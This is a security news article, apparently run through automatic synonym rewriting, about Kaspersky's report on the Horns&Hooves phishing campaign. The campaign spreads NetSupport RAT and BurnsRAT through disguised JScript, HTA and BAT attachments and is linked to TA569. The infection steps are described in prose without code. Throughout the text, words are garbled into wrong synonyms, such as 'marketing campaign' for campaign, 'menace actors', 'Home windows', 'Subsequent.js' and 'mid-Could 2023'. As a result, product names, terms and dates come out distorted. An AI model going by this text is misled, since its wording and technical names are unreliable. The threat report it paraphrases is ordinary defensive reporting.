A newly found malware marketing campaign has been discovered to focus on personal customers, retailers, and repair companies primarily positioned in Russia to ship NetSupport RAT and BurnsRAT.
The marketing campaign, dubbed Horns&Hooves by Kaspersky, has hit greater than 1,000 victims because it started round March 2023. The tip aim of those assaults is to leverage the entry afforded by these trojans to put in stealer malware comparable to Rhadamanthys and Meduza.
“Recent months have seen a surge in mailings with lookalike email attachments in the form of a ZIP archive containing JScript scripts,” safety researcher Artem Ushkov mentioned in a Monday evaluation. “The script files [are] disguised as requests and bids from potential customers or partners.”
The menace actors behind the operations have demonstrated their energetic growth of the JavaScript payload, making vital modifications through the course of the marketing campaign.
In some situations, the ZIP archive has been discovered to comprise different paperwork associated to the group or particular person being impersonated in order to extend the chance of success of the phishing assault and dupe recipients into opening the malware-laced file.
One of many earliest samples recognized as a part of the marketing campaign is an HTML Software (HTA) file that, when run, downloads a decoy PNG picture from a distant server utilizing the curl utility for Home windows, whereas additionally stealthily retrieving and operating one other script (“bat_install.bat”) from a distinct server utilizing the BITSAdmin command-line instrument.
The newly downloaded script then proceeds to fetch utilizing BITSAdmin a number of different information, together with the NetSupport RAT malware, which establishes contact with a command-and-control (C2) server arrange by the attackers.
A subsequent iteration of the marketing campaign noticed in mid-Could 2023 concerned the intermediate JavaScript mimicking official JavaScript libraries like Subsequent.js to activate the NetSupport RAT an infection chain.
Kaspersky mentioned it additionally discovered one other variant of the JavaScript file that dropped an NSIS installer that is then chargeable for deploying BurnsRAT on the compromised host.
“Although the backdoor supports commands for remotely downloading and running files, as well as various methods of executing commands via the Windows command line, the main task of this component is to start the Remote Manipulator System (RMS) as a service and send the RMS session ID to the attackers’ server,” Ushkov defined.
“RMS is an application that allows users to interact with remote systems over a network. It provides the ability to manage the desktop, execute commands, transfer files and exchange data between devices located in different geographic locations.”
In an indication that the menace actors continued to tweak their modus operandi, two different assault sequences noticed in late Could and June 2023 got here with a totally reworked BAT file for putting in NetSupport RAT and integrated the malware straight throughout the JavaScript code, respectively.
There are indications that the marketing campaign is the work of a menace actor often called TA569 (aka Gold Prelude, Mustard Tempest, and Purple Vallhund), which is understood for working the SocGholish (aka FakeUpdates) malware. This connection stems from overlaps within the NetSupport RAT license and configuration information utilized in respective actions.
It is value mentioning that TA569 has additionally been recognized to act as an preliminary entry dealer for follow-on ransomware assaults comparable to WastedLocker.
“Depending on whose hands this access falls into, the consequences for victim companies can range from data theft to encryption and damage to systems,” Ushkov mentioned. “We also observed attempts to install stealers on some infected machines.”
